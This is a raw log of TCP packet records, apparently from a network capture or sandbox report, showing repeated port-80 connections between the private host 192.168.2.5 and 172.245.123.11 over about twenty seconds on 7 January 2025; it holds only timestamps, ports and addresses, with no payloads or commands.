Jan 7, 2025 11:03:08.125499964 CET	50080	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.127477884 CET	50080	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.132219076 CET	80	50080	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:08.132275105 CET	50080	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.137053013 CET	80	50080	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:08.655086040 CET	80	50080	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:08.655101061 CET	80	50080	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:08.655206919 CET	50080	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.655483007 CET	50080	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.660237074 CET	80	50080	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:08.794349909 CET	50081	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.799283028 CET	80	50081	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:08.799381018 CET	50081	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.801397085 CET	50081	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.806334972 CET	80	50081	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:08.806380033 CET	50081	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:08.811224937 CET	80	50081	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:09.305763006 CET	80	50081	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:09.305857897 CET	80	50081	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:09.305923939 CET	50081	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:09.307440042 CET	50081	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:09.310820103 CET	80	50081	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:09.448200941 CET	50082	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:09.453087091 CET	80	50082	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:09.453175068 CET	50082	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:09.455148935 CET	50082	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:09.459909916 CET	80	50082	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:09.459975958 CET	50082	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:09.464755058 CET	80	50082	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:09.979574919 CET	80	50082	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:09.979695082 CET	50082	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:09.979774952 CET	80	50082	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:09.979826927 CET	50082	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:09.984523058 CET	80	50082	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:10.120696068 CET	50083	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.125555992 CET	80	50083	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:10.125629902 CET	50083	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.127399921 CET	50083	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.132160902 CET	80	50083	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:10.132210016 CET	50083	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.136965036 CET	80	50083	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:10.638492107 CET	80	50083	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:10.638606071 CET	50083	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.638617992 CET	80	50083	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:10.638674974 CET	50083	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.643384933 CET	80	50083	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:10.777056932 CET	50084	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.781954050 CET	80	50084	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:10.782028913 CET	50084	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.783771992 CET	50084	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.788574934 CET	80	50084	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:10.788630009 CET	50084	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:10.793348074 CET	80	50084	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:11.312037945 CET	80	50084	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:11.312133074 CET	50084	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:11.312315941 CET	80	50084	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:11.312355995 CET	50084	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:11.316914082 CET	80	50084	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:11.448606968 CET	50085	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:11.453418970 CET	80	50085	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:11.453493118 CET	50085	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:11.455241919 CET	50085	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:11.460047960 CET	80	50085	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:11.460088968 CET	50085	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:11.464854002 CET	80	50085	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:11.962011099 CET	80	50085	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:11.962130070 CET	50085	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:11.962187052 CET	80	50085	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:11.962230921 CET	50085	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:11.966856956 CET	80	50085	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:12.105926991 CET	50086	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.111032009 CET	80	50086	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:12.111133099 CET	50086	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.122215986 CET	50086	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.127053022 CET	80	50086	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:12.127099037 CET	50086	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.131897926 CET	80	50086	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:12.613564014 CET	80	50086	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:12.613722086 CET	80	50086	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:12.613769054 CET	50086	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.613769054 CET	50086	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.618551970 CET	80	50086	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:12.744656086 CET	50087	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.749488115 CET	80	50087	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:12.749566078 CET	50087	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.751332998 CET	50087	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.756129026 CET	80	50087	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:12.756186962 CET	50087	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:12.760936975 CET	80	50087	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:13.254630089 CET	80	50087	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:13.254733086 CET	80	50087	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:13.254813910 CET	50087	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:13.254867077 CET	50087	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:13.259632111 CET	80	50087	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:13.387712002 CET	50088	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:13.392617941 CET	80	50088	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:13.392707109 CET	50088	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:13.394450903 CET	50088	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:13.399197102 CET	80	50088	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:13.399252892 CET	50088	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:13.404037952 CET	80	50088	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:13.969722986 CET	80	50088	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:13.969826937 CET	50088	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:13.969885111 CET	80	50088	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:13.969933033 CET	50088	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:13.974601030 CET	80	50088	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:14.105317116 CET	50089	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.110172033 CET	80	50089	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:14.110264063 CET	50089	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.112335920 CET	50089	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.117120981 CET	80	50089	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:14.117177010 CET	50089	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.121917009 CET	80	50089	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:14.622642994 CET	80	50089	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:14.622718096 CET	80	50089	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:14.623238087 CET	50089	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.623238087 CET	50089	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.627974987 CET	80	50089	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:14.760353088 CET	50090	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.765156984 CET	80	50090	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:14.765228987 CET	50090	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.766930103 CET	50090	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.771677017 CET	80	50090	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:14.771733999 CET	50090	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:14.776462078 CET	80	50090	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:15.287640095 CET	80	50090	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:15.287763119 CET	50090	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:15.287869930 CET	80	50090	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:15.287909031 CET	50090	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:15.292548895 CET	80	50090	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:15.492283106 CET	50091	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:15.497076035 CET	80	50091	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:15.497150898 CET	50091	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:15.498904943 CET	50091	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:15.503643036 CET	80	50091	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:15.503726006 CET	50091	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:15.508538961 CET	80	50091	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.005959034 CET	80	50091	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.006071091 CET	80	50091	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.006104946 CET	50091	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.006122112 CET	50091	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.010889053 CET	80	50091	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.135246038 CET	50092	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.140104055 CET	80	50092	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.140180111 CET	50092	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.141899109 CET	50092	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.146660089 CET	80	50092	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.146706104 CET	50092	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.151443958 CET	80	50092	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.664949894 CET	80	50092	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.665049076 CET	50092	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.665102005 CET	80	50092	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.665149927 CET	50092	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.669773102 CET	80	50092	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.817953110 CET	50093	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.822832108 CET	80	50093	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.822909117 CET	50093	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.824640036 CET	50093	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.829369068 CET	80	50093	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:16.829443932 CET	50093	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:16.834243059 CET	80	50093	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:17.417833090 CET	80	50093	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:17.417958975 CET	80	50093	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:17.417958021 CET	50093	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:17.418014050 CET	50093	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:17.422734022 CET	80	50093	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:17.560092926 CET	50094	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:17.564894915 CET	80	50094	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:17.564954996 CET	50094	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:17.566756010 CET	50094	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:17.571482897 CET	80	50094	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:17.571531057 CET	50094	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:17.576294899 CET	80	50094	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.071057081 CET	80	50094	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.071145058 CET	80	50094	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.071243048 CET	50094	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.071286917 CET	50094	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.076056957 CET	80	50094	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.213244915 CET	50095	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.218060970 CET	80	50095	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.218142033 CET	50095	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.219871998 CET	50095	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.224633932 CET	80	50095	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.224687099 CET	50095	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.229538918 CET	80	50095	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.730529070 CET	80	50095	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.730626106 CET	80	50095	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.730694056 CET	50095	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.730726957 CET	50095	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.735502005 CET	80	50095	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.869750023 CET	50096	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.874866962 CET	80	50096	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.874934912 CET	50096	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.876897097 CET	50096	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.881644964 CET	80	50096	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:18.881699085 CET	50096	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:18.886626959 CET	80	50096	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:19.380067110 CET	80	50096	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:19.380182981 CET	50096	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:19.380218983 CET	80	50096	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:19.380266905 CET	50096	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:19.384938002 CET	80	50096	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:19.511743069 CET	50097	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:19.516616106 CET	80	50097	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:19.516693115 CET	50097	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:19.518410921 CET	50097	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:19.523231030 CET	80	50097	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:19.523284912 CET	50097	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:19.528042078 CET	80	50097	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.048472881 CET	80	50097	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.048569918 CET	50097	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.048644066 CET	80	50097	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.048685074 CET	50097	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.053365946 CET	80	50097	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.184870005 CET	50098	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.189671040 CET	80	50098	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.189738989 CET	50098	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.191623926 CET	50098	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.196415901 CET	80	50098	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.196458101 CET	50098	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.201200008 CET	80	50098	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.702660084 CET	80	50098	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.702755928 CET	80	50098	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.702835083 CET	50098	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.702868938 CET	50098	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.707633018 CET	80	50098	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.839621067 CET	50099	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.844459057 CET	80	50099	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.844542027 CET	50099	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.846611977 CET	50099	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.851397991 CET	80	50099	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:20.851457119 CET	50099	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:20.856266022 CET	80	50099	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:21.357232094 CET	80	50099	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:21.357258081 CET	80	50099	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:21.357331038 CET	50099	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:21.357400894 CET	50099	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:21.363986015 CET	80	50099	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:21.496067047 CET	50100	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:21.500886917 CET	80	50100	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:21.500965118 CET	50100	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:21.502944946 CET	50100	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:21.507738113 CET	80	50100	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:21.507812977 CET	50100	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:21.512559891 CET	80	50100	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:21.997504950 CET	80	50100	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:21.997565985 CET	80	50100	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:21.997605085 CET	50100	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:21.997646093 CET	50100	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:22.002829075 CET	80	50100	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:22.159041882 CET	50101	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:22.165786982 CET	80	50101	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:22.165906906 CET	50101	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:22.167857885 CET	50101	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:22.175905943 CET	80	50101	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:22.176021099 CET	50101	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:22.180824041 CET	80	50101	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:23.056798935 CET	80	50101	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:23.056888103 CET	50101	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:23.056926012 CET	80	50101	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:23.056969881 CET	50101	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:23.061666965 CET	80	50101	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:23.201620102 CET	50102	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:23.206453085 CET	80	50102	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:23.206538916 CET	50102	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:23.208534956 CET	50102	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:23.213357925 CET	80	50102	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:23.213433981 CET	50102	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:23.218199968 CET	80	50102	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.002123117 CET	80	50102	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.002234936 CET	50102	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.002501011 CET	80	50102	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.002687931 CET	50102	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.007083893 CET	80	50102	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.136826992 CET	50103	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.141647100 CET	80	50103	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.141756058 CET	50103	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.143870115 CET	50103	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.148655891 CET	80	50103	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.151005030 CET	50103	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.155747890 CET	80	50103	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.672724962 CET	80	50103	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.672827005 CET	80	50103	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.672832012 CET	50103	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.672882080 CET	50103	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.677649975 CET	80	50103	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.812764883 CET	50104	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.817564964 CET	80	50104	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.817650080 CET	50104	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.819726944 CET	50104	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.824448109 CET	80	50104	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:24.824518919 CET	50104	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:24.829349995 CET	80	50104	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:26.567924023 CET	80	50104	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:26.568026066 CET	80	50104	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:26.568048954 CET	50104	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:26.568085909 CET	50104	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:26.572829962 CET	80	50104	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:26.698710918 CET	50105	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:26.703660965 CET	80	50105	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:26.703741074 CET	50105	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:26.705790043 CET	50105	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:26.710586071 CET	80	50105	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:26.710639954 CET	50105	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:26.715425014 CET	80	50105	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:27.233051062 CET	80	50105	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:27.233166933 CET	50105	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:27.233438969 CET	80	50105	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:27.233498096 CET	50105	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:27.237973928 CET	80	50105	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:27.368809938 CET	50106	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:27.373611927 CET	80	50106	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:27.373692036 CET	50106	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:27.375411034 CET	50106	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:27.380177975 CET	80	50106	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:27.380300045 CET	50106	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:27.385107994 CET	80	50106	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:27.880409956 CET	80	50106	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:27.880517006 CET	80	50106	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:27.880660057 CET	50106	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:27.880706072 CET	50106	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:27.885438919 CET	80	50106	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:28.003825903 CET	50107	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:28.008713961 CET	80	50107	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:28.008810997 CET	50107	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:28.010884047 CET	50107	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:28.015669107 CET	80	50107	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:28.015736103 CET	50107	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:28.020504951 CET	80	50107	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:28.538222075 CET	80	50107	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:28.538322926 CET	50107	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:28.538368940 CET	80	50107	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:28.538414001 CET	50107	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:28.543150902 CET	80	50107	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:28.691000938 CET	50108	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:28.695904970 CET	80	50108	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:28.696001053 CET	50108	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:28.698115110 CET	50108	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:28.702960968 CET	80	50108	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:28.703037024 CET	50108	80	192.168.2.5	172.245.123.11
